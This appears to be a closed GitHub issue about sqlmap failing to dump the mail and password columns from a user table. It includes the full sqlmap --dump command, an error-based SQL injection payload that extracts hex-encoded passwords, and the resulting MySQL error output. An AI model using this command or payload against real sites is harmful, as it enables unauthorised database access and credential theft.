Closed
Description
I used sqlmap to test an SQL vulnerability on my site, but sqlmap can't dump data.
--random-agent -u xyz --data="submits=+ssssss+&username=l*&password=&x=45&y=7" -D ht_db -T en_users -C mail,password --dump --no-cast --hex -v 3
I tested with live header on Firefox with the sqlmap syntax 👍
post : xyz?md=login
data: submits=+ssssss+&username=l' AND (SELECT 9275 FROM(SELECT COUNT(*),CONCAT(0x3a6c65663a,(SELECT MID((HEX(password)),1,50) FROM ht_db.en_users ORDER BY mail LIMIT 82,1),0x3a7266653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EBZd'='EBZd&password=&x=35&y=16
and the response:
MySQL Error
Message: MySQL Query Error
SQL: select count(username) as counts from en_users where username='l' AND (SELECT 6076 FROM(SELECT COUNT(*),CONCAT(0x3a6c65663a,(SELECT MID((HEX(password)),1,50) FROM ht_db.en_users ORDER BY mail LIMIT 49,1),0x3a7266653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'lyfN'='lyfN' and password='d41d8cd98f00b204e9800998ecf8427e' and ch=1
Error: Unknown column 'mail' in 'order clause'
Errno.: 1054
It seems "order by" can't be used in this case, please fix it.
Thanks